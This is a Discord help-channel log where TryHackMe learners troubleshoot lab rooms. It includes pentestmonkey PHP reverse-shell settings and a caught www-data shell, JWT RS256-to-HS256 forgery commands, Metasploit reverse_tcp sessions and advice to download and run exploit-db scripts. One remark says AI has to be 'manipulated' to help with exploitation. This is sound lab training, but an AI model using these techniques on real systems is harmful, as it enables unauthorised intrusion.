#room-help

it was the pubkeys errring

Thank you

Gave +1 Rep to @analog heath (current: #1246 - 5)

What are you using to connect to the vm? what region if i may ask worked for this ?

Any ideaas on how to finish seasurfer? i get kyle but on a fresh connection /proc is not mounted

i rarely use Attackbox, and btw i use AsiaPecific region.

he doesnt seem to open the ssh connection he is meant too and i cannot escalate

Can you try sea surfer for me rq?

https://tryhackme.com/room/seasurfer

it will take time. i will do it, tomorrow.

Thank you

Im connecting via OpenVPN

do you want to connect to ssh attackbox in your machine?

I want to connect to the machine in Virtulisation & Containers to carry out the task

ssh thmuser@10.129.165.100 -o PubkeyAuthentication=no

Then enter the password tryhackme

Same error

Using OpenVPN to connect to the VM Havent changed regions.

use port 2222

ssh -p 2222 thmuser@10.129.165.100

Or
ssh -p 2222 -o PreferredAuthentications=password thmuser@10.129.165.100

Connection refused

Terminate + Start Machine again,
Wait 1–2 mins., Make sure OpenVPN still connected

use Attack box instead of OpenVPN Or change region and start machine again

Trying Attackbox now. This should not be this difficult

Ive even tried to cheat with a walkthrough but the answers are wrong !

ssh thmuser@10.129.165.100

ive restarted. diff IP address

Password: tryhackme

Use the new IP after restart the old one wont work

Guys, what's the best way to run Kali Linux as a secondary OS? Like, using an external HDD or an external SSD?

"Permission denied (publickey)

external SSD with full installation

ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no thmuser@NEW_IP

then SSH password login is maybe disabled on that VM use

it will acts as bootable OS, plug it boot it with, and run your OS on any device.

ssh thmuser@NEW_IP -i /home/tryhackme/.ssh/id_rsa

Nope

If that also fails then the Kubernetes vm is misconfigured

Failed

Thanks bro

Gave +1 Rep to @analog heath (current: #1091 - 6)

Password auth not accepted. Is the SSH key required for this task?

use external SSD and bootable Kali install not live USB

Wouldn't that be rather difficult to do?

Not really

the only tricky part is making sure you dont install kali on your main Windows drive

Would an HD be too slow? It would be a lower-priced option for me.

it will feel slow

yeah it's slow, you can use kali with it but large readwrite would slow down whole sessions.

If budget is tight HDD is fine

instead buy a 256GB SSD (external).

Okay, that's easy to solve.

Okay, I'll buy an external SSD then, thanks guys.

yeah just make a bootable usb by rufus or balena, boot it, when disk management come, insert SSD, you can select your whole SSD. that's it.

@thin forum yeah but 128GB is also still very fine. if budget is low.

But I think for now I won't use it so heavily.

Wow, that looks easy.

never create live USB for this. it will break you USB firmware in about 6-10months. if you want then you can do it with SSD. and yeah you can dual boot it, like grub had a option - Kali or any other OS like arch or ubuntu. BUT may give you headache at first😅

Someone from my college said: 'Considering that you're going to connect the external hard drive through a USB port, I'd say it won't make much difference using an external HDD or an external SSD.' Is that true?

ssh -v -o PreferredAuthentications=password thmuser@10.129.165.100

No, HDD with USB connector will make it more slow than ever😂.

also may add -o PubkeyAuthentication=no

however SSD always wins in terms of SPEED compared to HDD

Okay, I'll buy a 128GB SSD, it'll be much better.

Thanks bro

But if it's more expensive, I'll have to opt for the HD.

yes, but using it as externally, would give bad performance experience.

may it stucks when you start many tools and softwares.

So I'm going to invest in an SSD; I need good performance.

i knew HDD problems and it's readwrite speeds. glitches. i also used it as external by adding a connector, and it slowd down much more. :'))

Wow, I'm definitely going to buy the SSD.

Kkk

One last question, would a SATA or NVMe SSD be better?

but only buy if you really need this. because, if doing for cool stuffs, may get bored with it.

what i have to write here?

I really need it, it's quite boring to use Kali every day.

then you can buy SATA of any size under you budget.

Okay

J.Adams

bcuz, J.Adams had a True Positive alert.

it doesnt mention it anywhere in the task brief

what's issue?

ssh into Minikube server on Virtulisation & Containers

Cant get it working

@main coral has been trying to help

can i ask someting about the OSINT Level 3 iam stuck on a answer the i will have finished OSINT Level 3

yes

this is the question i goton all the other question - A tweet that once referenced “coming soon” is now deleted. It’s still visible in an archived repost. Which verification strategy is used to validate what was originally said?-

i dont know if i dont see it or dont see the answer as i have done from level 1 -3 and this last question

Hi, can you give me the link of the room? , i have hypothesis how to solve the question but i don't know which room is it.

Thank you i just want for a walk came back and got the answer

Okaay

But thank you for trying to help me

Im trying to do the "cat pictures" room. Found the hint on the phpbb forum. Executed what i am supposed to do. Port 4420 opens up (which was previously closed) but port 21 stays closed. I think i should find a hint that i could use to the port 4420. Does anyone have a hint?

'Knock knock' is the hint, there's a cybersecurity technique that has a name similar to that.

Thats what i have done. After doing that, port 4420 opens up, but port 21 stays closed. I think i need something from ftp to use on the 4420 port.

guy could you help me with creating room?

Hello

https://tryhackme.com/room/catpictures

I have a problem with this room, after a few hours of trying and after I watched some write-ups and videos on youtube for this room, still the solution doesn't work. Do you have any idea if it's possible that it's a bug?
It should be an easy room but the provided solutions across the internet are not working.

any hint would be useful

Also i tried to do the knock using the open-proxy hint discovered in nmap scan like this:

for port in 1111 2222 3333 4444; do
    curl -s --max-time 1 --proxy http://10.112.161.75:8080 http://10.112.161.75:$port
    sleep 0.5
done

Thanks

I have the same issue i think is a problem with the room

try port knocking?

I did it and still not working

Using knock package, using custom scripts, using Nmap. Port 21 remain filtred and closed

I think some of the rooms are indeed just broken

They are

can someone plz help me on mod 5 task 3? im on a chromebook and i dunno wtf lol

on what what now?

hello i am currently trying to complete AD Basics and im trying to create the Auto Lock Screen group policy object but when i try to navigate to local policies within the editor several areas are missing in the security settings. i cant figure out what the hell im doing can anyone help me out please

Local policy is not the same as group policy. On the DC you need to find group policy management console

Good day, I am busy with the JWT Security room, I have been on it for days, stuck on example 5, I have read all walktrhoughs as well as watched the videos, when it comes to editing the /usr/lib/python3/dist-packages/jwt/algorithms.py, so I can comment from 143-146 this is all there is return default_algorithms
and from all the walkthrough and video guidance their is it shouldn't be like this, I tried with the Echo agent, it is not solving anything, I tried with other AI agents, and did troubleshoot but it wont run to give me the flag. from the token I get when you run the curl -H 'Content-Type: application/json' -X POST -d '{ "username" : "user", "password" : "password5" }' http://10.10.164.32/api/v1.0/example5 and got to jwt.io I edited the the alg from the "RS256" to "HS256" then the admin: 1, I copied the jwt and run the curl -H 'Authorization: Bearer [your JWT Token]' http://MyMachineIP/api/v1.0/example5?username=admin, but then it send the "message": "JWT could not be read: Signature verification failed"
from the instruction as followed it is not working for me to get the flag, please help as from the file I need to edit line 143 is not the same as everyone and I am fraustrated as I have gotten everyhting but not that flag

ms@Mac ~/Documents % curl -H 'Content-Type: application/json' -X POST -d '{ "username" : "user", "password" : "password5" }' http://10.64.xxx.217/api/v1.0/example5
{
  "public_key": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHSoarRoLvgAk4O41RE0w6lj2e7TDTbFk62WvIdJFo/aSLX/x9oc3PDqJ0Qu1x06/8PubQbCSLfWUyM7Dk0+irzb/VpWAurSh+hUvqQCkHmH9mrWpMqs5/L+rluglPEPhFwdL5yWk5kS7rZMZz7YaoYXwI7Ug4Es4iYbf6+UV0sudGwc3HrQ5uGUfOpmixUO0ZgTUWnrfMUpy2dFbZp7puQS6T8b5EJPpLY+iojMb/rbPB34NrvJKU1F84tfvY8xtg3HndTNPyNWp7EOsujKZIxKF5/RdW+Qf9jjBMvsbjfCo0LiNVjpotiLPVuslsEWun+LogxR+fxLiUehSBb8ip",
  "token": "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJhZG1pbiI6MH0.kR4DjBkwFE9dzPNeiboHqkPhs52QQgaHcC2_UGCtJ3qo2uY-vANIC6qicdsfT37McWYauzm92xflspmSVvrvwXdC2DAL9blz3YRfUOcXJT03fVM7nGp8E7uWSBy9UESLQ6PBZ_c_dTUJhWg35K3d8Jao2czC0JGN3EQxhcCGtxJ1R7T9tzBMaqW-IRXfTCq3BOxVVF66ePEfvG7gdyjAnWrQFktRBIhU4LoYwem3UZ7PolFf0v2i6jpnRJzMpqd2c9oMHOjhCZpy_yJNl-1F_UBbAF1L-pn6SHBOFdIFt_IasJDVPr1Ybv75M26o8OBwUJ1KK_rwX41y5BCNGcks9Q"
}

ms@Mac ~/Documents % curl -H 'Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJhZG1pbiI6MX0.7jJBv<REDACTED>l0o7imBV0wa0HTDPRMavGbPyU' "http://10.64.xxx.217/api/v1.0/example5?username=admin"
{
  "message": "Welcome admin, you are an admin, here is your flag: THM{REDACTED}"
}

much easier to use jwt.io to edit the token, instead of modifying algorithms.py

1. change to HS256
2. change admin to 1
3. Use public_key as the Secret and Sign JWT <--- My guess, you didn't do this step

issue in reserve shell, I am in https://tryhackme.com/room/breakmenu room. I used cve20231874.py to get admin privilege. it worked. I added php reverse shell script as suggested in pentest monkey in theme function file after visiting to theme file editor. the script is as set_time_limit (0);
$VERSION = "1.0";
$ip = '192.168.162.7'; // CHANGE THIS
$port = 1234; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0; where 192.168.162.7 is my Internal virtual IP address given by tryhackme. the same is also display by using ip a | grep tun0 34: tun0: <POINTOPOINT,NOARP,UP,LOWER_UP> mtu 1380 qdisc noqueue state UP group default qlen 1000
inet 192.168.162.7/17 brd 192.168.255.255 scope global tun0
. i saved the edit theme file after inserting my php reverse shell script and opened a listener on a terminal in my machine by rlwrap -f . -r nc -nvlp 1234
listening on [any] 1234 ... . i visited dashboad, post or ant other page in given thm vulnerable wordpress breakmenu pages but didn't receive ant reverse shell on my terminal. Earleir THM provide vpn ip start from 10. x.x.x that was work ... can any one help me

I did all that but still didn't get the token

Please elaborate step 3

copy-paste this into the Secret field on jwt.io JWT Encoder section : ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHSoarRoLvgAk4O41RE0w6lj2e7TDTbFk62WvIdJFo/aSLX/x9oc3PDqJ0Qu1x06/8PubQbCSLfWUyM7Dk0+irzb/VpWAurSh+hUvqQCkHmH9mrWpMqs5/L+rluglPEPhFwdL5yWk5kS7rZMZz7YaoYXwI7Ug4Es4iYbf6+UV0sudGwc3HrQ5uGUfOpmixUO0ZgTUWnrfMUpy2dFbZp7puQS6T8b5EJPpLY+iojMb/rbPB34NrvJKU1F84tfvY8xtg3HndTNPyNWp7EOsujKZIxKF5/RdW+Qf9jjBMvsbjfCo0LiNVjpotiLPVuslsEWun+LogxR+fxLiUehSBb8ip

what do you mean here? Show your terminal output. When everything is encoded properly on jwt.io, the resulting JWT token is then used in the final curl command that then outputs the flag

i can confirm this is working as expected (using my own machine over openvpn)- this is a great writeup that outlines the steps: https://0xb0b.gitbook.io/writeups/tryhackme/2024/breakme

key differences:

1. Switched to 2021 Theme in Theme Editor
2. Replaced 404.php with pentestmonkey
3. in Terminal nc -lvnp 4444
4. Nav to http://breakme.thm/wordpress/wp-content/themes/twentytwentyone/404.php to call revshell

ms@Mac ~/Documents % nc -lvn 4444                                                 
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64 GNU/Linux
 00:53:02 up  2:33,  0 users,  load average: 0.00, 0.09, 0.46
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (604): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Breakme:/$ whoami
whoami
www-data
www-data@Breakme:/$ hostname
hostname
Breakme
www-data@Breakme:/$ 

Issue is IP address of my machine in receiving . THM vpn provides virtual ip address 192.168.x.x. In place of earlier 10.x.x.x

yes that is the new config, i have same and no issue, that is the "magic" of routing. THM changed their OpenVPN infrastructure so that your tun0 is on a 192.168.x.x network, and the OpenVPN server routes traffic between your tun0 and the target’s 10.x.x.x address space. You no longer need an IP in the same subnet because routing tables handle the connectivity.

---snip---
2026-03-22 17:46:34 /sbin/ifconfig utun9 192.168.xxx.x6 192.168.xxx.x6 netmask 255.255.128.0 mtu 1380 up
2026-03-22 17:46:34 /sbin/route add -net 192.168.128.0 192.168.xxx.x6 255.255.128.0
add net 192.168.128.0: gateway 192.168.xxx.x6
2026-03-22 17:46:34 /sbin/route add -net 10.64.0.0 192.168.128.1 255.240.0.0
add net 10.64.0.0: gateway 192.168.128.1

just run ip route to see for yourself:

ms@Mac ~/Documents % ip route                                                    
default via 192.168.0.1 dev en1
default dev bridge100 scope link
default dev bridge101 scope link
10.64.0.0/12 via 192.168.128.1 dev utun9

Hi can someone help me in one lap?

you can just drop your question, someone will get to it eventually

Ok

I can't send photos?

Sorry im new here

type "/verify" on any channel and paste your discord token when prompted. you'll find your token in your account details on tryhackme

Im i in public now?

https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

What 'public' mean?

im now in Offensive Security Intro lap in task 3 its ask me to hack fake bank but i can't found the bank IP, so where can i find it?

The machine IP is provided inside the lab environment itself

Use the given IP Open it in browser http://<IP>

I found that my try hack me account need update

how can i update it?

screen shot pls

Can i dm u?

sure

I think the room Upload Vulnerabilities has a bug. Even after adding the ip and the hosts in the /etc/hosts, I can't be able to view the urls.

Please read the instructions in task one. You must access this server with one of the following virtual hosts:

    overwrite.uploadvulns.thm
    shell.uploadvulns.thm
    java.uploadvulns.thm
    annex.uploadvulns.thm
    magic.uploadvulns.thm
    jewel.uploadvulns.thm

Refer to the instructions in task one for more information

Anyone having the same issue?

Yes. it is broken

And they won't fix it.

So yeah.

Hello. So im trying to use use windows/meterpreter/reverse_tcp payload ( on metasploit as u can guess )

The handler and exploit works successfully i belive but after trying to execute the payload this happens:

10.129.181.154:455 - Executing the payload...
10.129.181.154:455 - Service start timed out, OK if running a command or non-service executable...
Exploit completed, but no session was created.

Why are sessions not being created sometimes?

i just tried again and somehow worked

please anyone i need help with Azure:tapper

i am unable to connect with metasploit ip's machine in the room with attackbox for some reason i do not understand

can someone help me with this

please

https://ibb.co/jscS9ZH

I've also connected with the ovpn file

just wait, let the machine start. try to ping it first.

cause the LHOST is wrong a firewall or a Defender blocks the connection the payload crashes or the port is blocked so Metasploit finishes the exploit but no session is created

the yt video on the "Pre Security > Network Fundamentals > intro to LAN" module is in a different language, just wanted to confirm that it is for everyone lol

go to the settings, check audio track change it to ENG original.

settings for what? youtube?

that's strange when i was on there originally there was no option for that and it was a different language, after closing browser and reloading it is now back to english lol not sure what happened but thank you!

Gave +1 Rep to @analog heath (current: #979 - 7)

Do some of the rooms just have weird behavior or something? I've been stuck on the Active Directory room for a really long time, even with help from some of you here.

What was it you were struggling with on there

Task 4: Managing Users with AD

I'm trying to log into Phillip's account using the THM virtual desktop.

From Pinned Messages:
Everyone who is looking for help. Volunteers can and will refuse to help you if you are being ignorant and not detailing what your issue is.

What Room? (Link, Room title, room code from URL)
What Task? (Give the number!)
What question? (Number, maybe also basic details)
What have you tried?
What happened?
What didn't happen?
What did you expect to happen?
A picture paints a thousand words. Don't type a thousand words. Screenshots are awesome. Photos of your screen are not.

Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Looking for help with frp??

use remmina. with RDP protocol.

I did that, I explained the problem in detail and nobody really bothered. It happened for the second time.

and what does it say?

well a lot of people needs help. Just write it more times with some normal span

but I think I know where you are making a mistake, I've struggled there a bit too

yeah, cool

Could somebody please help me with this one? It's Burp Suite: The Basics, Site map, issue definitions, the Chellenge. Challeleng says: Take a look around the site on http://10.112.183.98/ — we will be using this a lot throughout the module. Visit every other page that is linked on the homepage, then check your sitemap — one endpoint should stand out as being very unusual!

Visit this in your browser (or use the "Response" section of the site map entry for that endpoint)
The question: What is the flag you receive after visiting the unusual endpoint?
There is no flag, no enpoint standing out, nothing unusal, no map

did you click on everything?

I type localhost into the RDP and then let’s me log in as normal

yes

yes, I clicked everything

could u send link to that room please

I dont even remember this room but I know I did it somehow

https://tryhackme.com/room/burpsuitebasics

The hint says: You are looking for a suspicious page with a name made up of a series of random letters and numbers

Ther is no page like that

then you should get some weird url

and the flag lies in it

check all pages, links. instead you can just see source code and click on every link.

there surely is

Yes I know I should. I know it by the fact that the task descrition says so. But since I clicked on everything and there was no page, Im here

and for you, input Domai: THM also. otherwise input username as THM/phillip. because just username, is not there as it's an active directory.

let me check.

ok

@molten cloak click on every links, and objects, even the products and its buttons

almost everyone had this problem lol

see this. can you see a url with gibberish words? that's your flag.

Cool. I don't have it

u surely can get in there

u just need to click on everything

while surfing every page, just click on every link object with your mid-mouse-wheel-button that will speed up this things.

found it too

check all products!!

very advanced tip

@molten cloak click on every things, buttons like see more.

then your flag will lay in there

there is no "see more" button

not exactly that, we dont want to show u the solution but to help u get there

I did ceck all products. Do you want me to send you a video of me clickingon everything? I sent a screenshot, it's clearly not there

it must be theree c'mon dont give up

Im not giving up, I just don't know the reason why it's not showing or what I do wrong

u do nothing wrong, u just didnt discover it yet

is your burp proxy is active?

how do I make sure it is?

try to visit someth and look at it if it updates

how did you connect your browser to burp?? with foxyproxy?

yes, I opened firefox, then foxy proxy then I enabled Burp

check it, open any random website, and see if you see sitemap of it.

ok

if yes, then again, click on every object!, specially in products page.

I got this when openning Google

okay its working

now click on every link or button or any image.

I clicked on products. Many times and no item is there

So you dont get this page?

fill the form too

i mean with any random gmail msg and name, and send it,

okay now done!

see contact and support. fill them with random detail and send it. you will get your point.

ok

@molten cloak do on both, contact and support!

ok, now the whole attackbox just stoped working a minute please

if still not done. just click support and see sitemap! 😂

i think now it's done. wlcm!

Hi all could someone please help me with this room,
https://tryhackme.com/room/tapper
Task 2 - im having access issues for the account gumby. Im unable to assign the account to my authenticator app to sign in, i believe this is a bug on the room ive been attempting to access the account for over 3 weeks now checking daily.
Thank you

Ok, so I sent a ticket through support and now I got the item Im looking for. Can you tell me why did it take that to find this item? Or can you direct me to the room where it's explained?

i mean, on the target website, just click on support tab, and see in burp site sitemap.

There is no sitemap here

see in burpsuite sitemap

@molten cloak the second one is the key.

Yes, I said I found it. Meaning, it's there

finally you had done!.

Yes, but since I have no idea why and what actually happened I asked you to tell me what heppend

or direct me to some place on THM where it's explained

so I can, you know... learn something

you may found some tutorials on youtube, or if your prefer to read, then medium had a writeUps for most of the rooms.

uhhh.. Ok

well, thanks for your help with this one!

You may be overthinking this - the room builder's intent was to test how thorough the learner is at "walking the site". Remember when you said you clicked "everything" on the site. The lesson is thoroughness and proper enumeration using Burp, nothing more.

Hey, anyone might have some time to check it? Thats the link for it https://tryhackme.com/room/customtoolingviaburp or any customtooling room

hello im doing gobuster the bacis and this is the error i get sudo: unable to resolve host ip-10-112-80-74: Name or service not known

could you give full command you have used?\

i found a solution on reddit

add the ip to /etc/hosts

yep

Hey guys, how is the points stuff on tryhackme platform working? Last weak I studied 12 rooms and I got about 1200 points, so its about 100 points per room. This week I have been studied 4 rooms yet and I got 88 points so far for all 4 rooms together. (I would svear I had more points but suddenly I got demoted or something..) Are there some things for what I can get demoted my points?
...I just like the lederboad things 😄

Every room has different point

Hello guys, im doing the Operation System Security Room, i need to try to find the Top 7 passwords and guess the Johnny's password, i have no idea how to do it, i cant find the top 7 passwords, any help pls ?

There should be link to them

Or a folder

i dont find any

lol found it, not that easy for a begginer ngl

Greetings all. New to THM and am currently taking part in the JR Pentester path. I am finding there are times the FFUF web fuzzer is not installed. In the most recent room I am working this was the case and I had to manually install. Am I doing something wrong here? The exercises say the app should already be installed. So I am just wondering if this is a normal occurrence?

It's unfortunately a known issue, the solution is to find an alternate tool - even better, work from your own vm with all your tools under your control
Alternate possibilities: wfuzz / feroxbuster / dirsearch / gobuster

So it is entirely feasible to run a VM with Kali and vpn into the THM environment? As an example I should say. Oh and thank you so much for the quick response. Very much appreciated.

considering i've been rolling like that the past 5 yrs, i'd say it's more than possible, it's a way of life worth living

Thank you soo much, it worked. I had not added the ssh-rsa to the secret; that was the missing part. I truly appreciate. it was a great success.

Gave +1 Rep to @slim bison (current: #654 - 12)

THM Custom Tooling using Burp

ok, i'll try and google how to do that

Hi, so like I'm new to Linux. I use Virtual box for operate Linux, but I stumbled across a problem when I tried to attempt the meow question(the beginner question). When I tried to ping the given IP, it wasn't really doing the job or trying to enter the telnet service of that IP, I was getting session error messages. How can I fix it? I'm really new here.

Check VM network NAT or Bridged make sure target machine is started , use telnet IP port , install telnet if missing and restart VM sessions often expire

You use Linux on virtualbox to ping machine on thm? If yes are you already activate vpn connection?

Well, I don't got vpn activated. I'm bit confused with openVPN

Assuming u use debian based Linux, install open vpn using sudo apt install openvpn then download the vpn configuration from your acount. On the directory where the configuration file downloaded run sudo openvpn [configuration filename]

Thank you all for the quick response. I will load in and finish my first challange soon.. 🙂

Can anyone just give me the answers to Virtualisation and Containers task 6? I'm done messing about with things that won't work.

so did it work?

and what the thing that is not working with you? so you are on task 6 of kubernetes, right?

Yeah. I can't get into the server. Nothing works.

look, don't just copy paste answers, it will not teach anything.

okay, open that room, let the machine start.

i'll be there to help you completing this task.

I agree 💯%

ping me, when your machine is ready.

DM'd you. Machines are ready

okay now, type minikube start in terminal.

okay, now you can just type commands that are given in hints like kubectl get pods.

and all of your answers will be easy from now.

it's good to see Hints for this tasks.

if any issue occur, tell me.

Thanks a lot

I'll have to get back to you later haha. Between the trouble I was having and then trying to figure out how to get Kali set up, I spent many many hours on the room which should take 20 minutes. When we had a break in the weather I decided to take a little mental break as well and get some work done in the garage. Diving back into learning today.

Sorted. If id known all I needed to do was minikube start 🤦🏻‍♀️

The same, I've watched some videos in that section and everyone was complaining about that 20 minutes... Probably they have forgetten to write one more 0. Anyway you might have problem with your kali while attacking target machine. I've tried to do in my machine and it did not find any vulnerable but when I do it with attack box it worked well. Good luck mate.

Cheers!

Hey everyone! 👋 I'm working on the Metamorphosis room and running into a weird issue.

I successfully pulled webapp.ini via rsync, changed env = dev, and uploaded it back. The /admin/index.php page now loads fine. However, whenever I submit any username (even just 'tom') or try to run sqlmap, I instantly get a 500 Internal Server Error from config.php.

I've already verified the uploaded file with cat -A to ensure it has correct Linux line endings ($ only, no ^M$ CRLF issues) and no extra spaces. I also restarted the machine just in case the backend MySQL crashed, but the 500 error persists.

Has anyone else experienced this? Is there a specific trick to formatting the .ini file that I'm missing, or is the box acting up? Any hints would be appreciated!

The "Breaching AD" room/network on the Red Teaming path is in need of a reset

Consistently trying to access ntlmauth.za.tryhackme.com with my browser after setting up DNS and confirming I can reach the site, as well as completing the password spray and confirming that can reach the site, but nothing works to access the site.

could you send me room link?

http[:]//tryhackme[.]com/room/breachingad

and my network is not reachable, i connected through breach-ad openvpn but even ping doesn't responds. I pressed to reset network.

I think I found my problem. Thanks anyway.

Go it figured. Huge thank you, again.

Gave +1 Rep to @errant burrow (current: #2400 - 2)

Hello all. I’m a noob with 0 experience. lol
Looking to create mod menus and simple UI for single player games. Or am I in the wrong place?

Game hacking is against ToS of Discord.

If the goal was to teach SOC skills, congratulations, you taught frustration, not analysis

The fake flag in the SOC L1 Alert Reporting task feels misleading. Was it designed like that?

I’m not hacking a game. I’m wanting to create a mod menu for a single player game, not create game cheats for multiplayer game’s

It's the same thing

Then why do games incorporate mods into their game or allow people to create them in a game?

That's not my point.

It's against the terms of service for this platform to discuss it

Ohhhhh… sorry. I catch your drift now.

Hi all, I'm trying to do the shadow trace room in the soc lvl 1 pathway... does anyone else have issues with the vm being completely unusable? I've terminated and restarted 3 times and each time it crashes after about 30 seconds!

I got issues with the SOC L1 Alert reporting. I got a flag but it might be a fake

which bit are you stuck on?

I'm trying to get a flag after escalating the phishing ticket. But when I got the flag, the system marked it as incorrect

I'm doing it to study for the CySA+ exam, but the way this is going, I might have to bite the bullet and buy the Jason Dion course

is that task 3 or task 4?

Task 4

I probably will do it eventually, I'm looking at completing this course, doing the THM SAL cert, finish my security+ which I don't think will take long and then look at CySA+ after

What flag did you receive after correctly escalating the alert from the previous task to L2?

is it that question?

THM{nice_attempt_faking_microsoft_support} but when I typed it in, it comes out wrong, even when I typed it in correcly

that's the answer to the last question in task 3

Did THM pulled one on me?

no there is a different answer ahah, would you like me to give it to you or are you going to keep going with it?

How do I get the correct answer?

I can't remember because it still has all of my answers saved from when I completed it, but it was a while back when I did it!

By the sounds of the question, literally just making sure it gets escalated?

So, what is the answer? And is it against policy to give me the answer?

I have no idea since I don't ever use this discord channel, literally just wanted some help with the VM! So I'll give it to you anyway...

THM{good_job_escalating_your_first_alert}

Thanks

And I would have helped with your problem, but sadly, I don't have the answers as well. So sorry.

no problem at all, I seem to have got it working!

I'm having some issues with the Gobuster: The Basics room. I finally managed to force my Kali to use the right address, I had to add it to /etc/hosts, but it gives me this error:
[ERROR] error on word aag: lookup aag.offensivetools.thm. on 10.65.165.212:53: server misbehaving I know I'm not using the correct wordlist but I do not have the same wordlist from the AttackBox on my Kali VM. I can ping the maching just well, so the VPN works fine. If I try to reach it through a browser I get a Forbidden error. Not too sure why it doesn't work, it also doesn't work for me when using the AttackBox on THM's website, even when I follow the instructions to the letter.

I managed to get the dir task working by using the IP address intead of the domain, but the dns task doesn't work at all

Can you send a screenshot of your etc/hosts?

Hi everyone, I'm new to TryHackMe and I'm currently stuck on Task 8 in the 'File Inclusion' room. I've been trying to find the solution but I'm having a hard time getting it right. Could someone please give me a hint or point me in the right direction? Thanks a lot!

please show your gobuster command and screenshot. I'm guessing this is Task 5. Please make this easier for volunteers to help you. All i can say at this point, it works as expected from THM's Attackbox. I did use the -r flag with gobuster

Hey guys I think I found an issue in Linux Shells room in the Cyber Security 101 room?? I'm trying to work through some paths and the material does not match what I'm supposed to and the directory I"m supposed to go into does not exist

I mean I could probably complete the room but idk I like following along in the shell to like learn as I go and I was like uuuuuuh

ty - please report it to #1333993673381253162

Gave +1 Rep to @austere niche (current: #3698 - 1)

it's an archived channel and I can't post in there

sorry, try #1333993673381253162

ope thanks still figuring out all the rooms here

ye- so many bugs, so little time... or bug spray

rip it's been there since October

Hi, I am in the Upload Vulnerabilities room. I've followed the necessary instructions of adding the appropriate line in the hosts file. When I go over to overwrite.uploadvulns.thm/, I get the following:
"Please read the instructions in task one..."

I believe the vhosts have had enough time to get up and running but all the domains give the same 'error'.

Could this have something to do with using a NAT configuration instead of a bridged adapter in my virtualbox VM settings?

Hey there! I need some help regarding one room. I am currently at OWASP Top 10 2025: Application Design Flaws (https://tryhackme.com/room/owasptopten2025two), trying to complete the AS06: Insecure Design part (Task 5) , but I got stuck and could use some guidance. The room talks about bad logic designs or architecture that can compromise an app, and gave me an example from the Clubhouse app (https://www.networkintelligence.ai/blogs/vulnerabilities-and-privacy-issues-with-clubhouse-app/). I get the Challenge "Navigate to [IP_ADDR]. Have they assumed that only mobile devices can access it?", but nothing stands out. It's just a page with nothing special in the source code. Even if I use burp to edit the request headers and modify the User-Agent to mimic a mobile device, I still get nothing different from the basic request. Any suggestions?

The app only assumes mobile access but doesnt enforce it try enumerating hidden endpoints instead of changing the User Agent the answer is exposed via a public API

I am facing the exact same issue. Windows Network Analysis room Task 5. Both VMs boot but getting status code 500 "Internal Server Error" at step 5.

Followed suggestions from @main coral to no avail. Still get 500 error. Is there a solution for this issue?

Then 500 Internal Server Error is room side not your setup

Yes, I know. It's a problem with the web app, which far as I can tell, is a python script.

Is there a solution to the problem? People have been asking for help with this issue since 2025 but I have yet to see a solution.

No user side fix It is a backend Python app bug

Hello! Hoping to find some help with the Room Custom Tooling using Burp. I am struggling with getting the "SECOND_VM_IP". I started the target VM, then the AttackBox. They say "You can find and start the second VM from this room(which is a link). We will use the IP address of the second VM as SECOND_VM_IP in this room." When I go to that room it tells me the VM is not in my region. Anyone else run into this? Thanks!

I am having issues loading the Windows network in the Lateral Movement and Pivoting lab. When I hit start the network just loads up forever. I started the lab yesterday and it’s still loading up the network 24 hours later

10.65.162.55 offensivetools.thm 127.0.0.1 localhost 127.0.1.1 kali ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters

This is my hosts. So now it seems to be working better I didn't change anything aside from re-launching the machine. The AttackBox works now even though it didn't earlier. I also downloaded the wordlist to my computer but I don't get any hits on my machine and I was getting hits on the AttackBox. I use the command: gobuster dns -do offensivetools.thm -w /usr/share/wordlists/subdomains-top1million-5000.txt Notice that I use -do instead of -d because on the verion of gobuster that I have on the Kali image, -d is for delays not the domain name.

hello could somone help me with ctf?

which one?

FIX THE " Gobuster the basics" ROOM PLEASE!!!!!

and what's the issue?

the url is not working "offensivetools.thm"
I changed the vbox multiple times then it worked

Everyone is having an issue with this room I think it needs to be fixed

simple ctf

that's easy...

i checked the write up and i found anwser but i was confused for 4hours

because i was working on it with chat ghpt

just understand the flow.

ye like when i found cve i didint know how to use it against the app

you can exploit it, always try to search for it first. see what actually it is. you can use tools like searchsploit or direct web on exploit-db.

ye i wanted to exploit it and told it to chat gpt and he told me that its not my level to exploitations instead of this i should look for solutions on site// ill not longer will suggest by chatgpt i guess

yeah, as in this feild AI doesn't help anyone directly, we need to manipulate it😁 , and instead rely on AI, first after getting a CVE, get the app version, then check for CVE number in exploit-db or direct search on google. download the script which matches version and then just redact the IP, and exploit it.

have you exploited that CVE? if not, try with your own. like search for that in google. download the script which matches the version number.

can i dm you cus i cant upload photos here

okay.

You need to verify to upload photos here

hy

yep

I'm having trouble with Exercise 3 "javascript"

Even when I enter JSISFUN, I keep getting an error

in JavaScript essentials room?

y

which task?

3

I've refreshed the page several times and entered the code correctly, but it won't let me continue

there's nothing like this in Task3

Click the "View Site" button on this task. On the right-hand side, add JavaScript that changes the demo element's content to "Hack the Planet"

I've tried this several times and I've entered the information, but it keeps telling me, “There was a problem, please try again later.”

send a screenshot, because in my machine there is no View Site button.

where it is?

How can I send images?

yes.

I don't understand why I can't upload images to Support

verify id.

this is How websites work room. and your answer is completely correct.

@jolly hill try to log out your account, and login back. and see if it works

ok thx !

dms @unborn anvil

hi

